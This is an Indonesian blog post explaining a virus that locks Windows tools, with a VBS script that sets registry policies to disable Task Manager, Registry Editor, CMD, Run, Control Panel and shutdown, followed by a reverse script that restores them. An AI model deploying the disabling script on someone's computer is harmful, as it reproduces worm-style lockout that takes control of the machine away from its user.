Berawal Dari Ide

4/24/2010 03:52:00 PM  the 476ks  No comments

berawal dari ide yang tidak disengaja disebabkan komputer teman yang terkena virus,aneh yaitu komputernya tidak bisa di shutdown,menu run hilang, task manager di kunci,folder option hilang,aktifitas klik-kanan di blokir biasa ciri kas virus buatan indonesia,karena kepepetnya waktu tu teman tidak sabaran di sebabkan pekerjaan kantor yang numpuk dan tidak sempat analisa, akhirnya menggunakan jurus sakti,jurus pemungkas, format dan install ulang sambil lalu ku copy file exe yang mencurigakan, dan simpan di tempat yang aman, buat di analisa.
analisa pertama kesimpulannya virus hobby memblokir menu security milik windows dan cari cari di mbah google ketemunya adalah script vbs untuk menormalkan kembali, jika anda ingin coba silakan copy script ini ke notepad simpan dengan tulisan virus.vbs ( ingat extentionnya harus vbs ) dan jalankan script tersebut kemudian restart komputer anda apa yang terjadi
—————script vbs disable ———————-

Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
on error resume Next
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\system\DisableRegistryTools", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\system\DisableTaskMgr", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\system\DisableCMD", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\system\NoDispCpl", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoRun", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoFolderOptions", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoTrayContextMenu", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoClose", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoFind", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoViewContextMenu", "1", "REG_DWORD"
WshShell.RegWrite "HKCU\software\microsoft\windows\currentversion\policies\explorer\NoControlPanel", "1", "REG_DWORD"

—————script vbs disable ———————-
jika komputer anda sudah posisi restart check menu run, (ctrl+alt+del) untuk melihat taskmanager dan folder option,serta shutdown semuanya hilang, lantas bagaimana cara mengembalikannya kembali
copy script dibawa ini agar anda tidak report merubah angka 1 menjadi nol, ingat pelajaran registry 1 menjadi disable 0 menjadi enable
—————script vbs enable ———————-
Dim WshShell
Set WshShell = WScript.CreateObject(”WScript.Shell”)
on error resume Next
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\DisableRegistryTools”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\DisableTaskMgr”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\DisableCMD”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\system\NoDispCpl”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoRun”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoFolderOptions”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoTrayContextMenu”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoClose”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoFind”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoViewContextMenu”, “0″, “REG_DWORD”
WshShell.RegWrite “HKCU\software\microsoft\windows\currentversion\policies\explorer\NoControlPanel”, “0″, “REG_DWORD”
—————script vbs enable ———————-
setelah anda simpan menjadi nama antivirus.vbs,jalankan scriptnya dan shutdown dengan cara menekan power pada CPU kira kira 5 second atau sampai komputernya shutdown sendiri baru dilepas powernya dan kita tekan kembali tombol power untuk menghidupkan, virus vbs berhasil disembuhkan.
Catatan :
vbs script ini juga bisa di gunakan untuk mengenable registry,menu run dan taskmanager, folder option yang biasa dipakai oleh pembuat worm mendisable fasilitas tersebut
salam.
Hacker Be Smart Atjeh

Posted in:

0 komentar:

Posting Komentar

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites

 

Selamat Datang

Selamat datang di The476ks - saya senang Anda berada di sini, dan berharap Anda sering datang kembali. Silakan berselancar di sini dan membaca lebih lanjut tentang artikel dunia hacking,crakking,software, news, cheat Point blank, ninja saga, dan lainnya semua ada disini. Ada banyak hal tentang kami, Anda mungkin akan menemukan sesuatu yang menarik. Selengkapnya tentang kami

Sepintas Tentang Admin

Nama saya De Young Fand, saya yang membentuk blog ini yaitu the476ks yang nama lahir dari nama kota saya tinggal. Saya seorang designer, blogger, teknisi, gammer. Spesialisasi pada Blogger blogs, CSS, XHTML dan jQuery serta php Msql.

Navigasi

Social Stuff

the476ks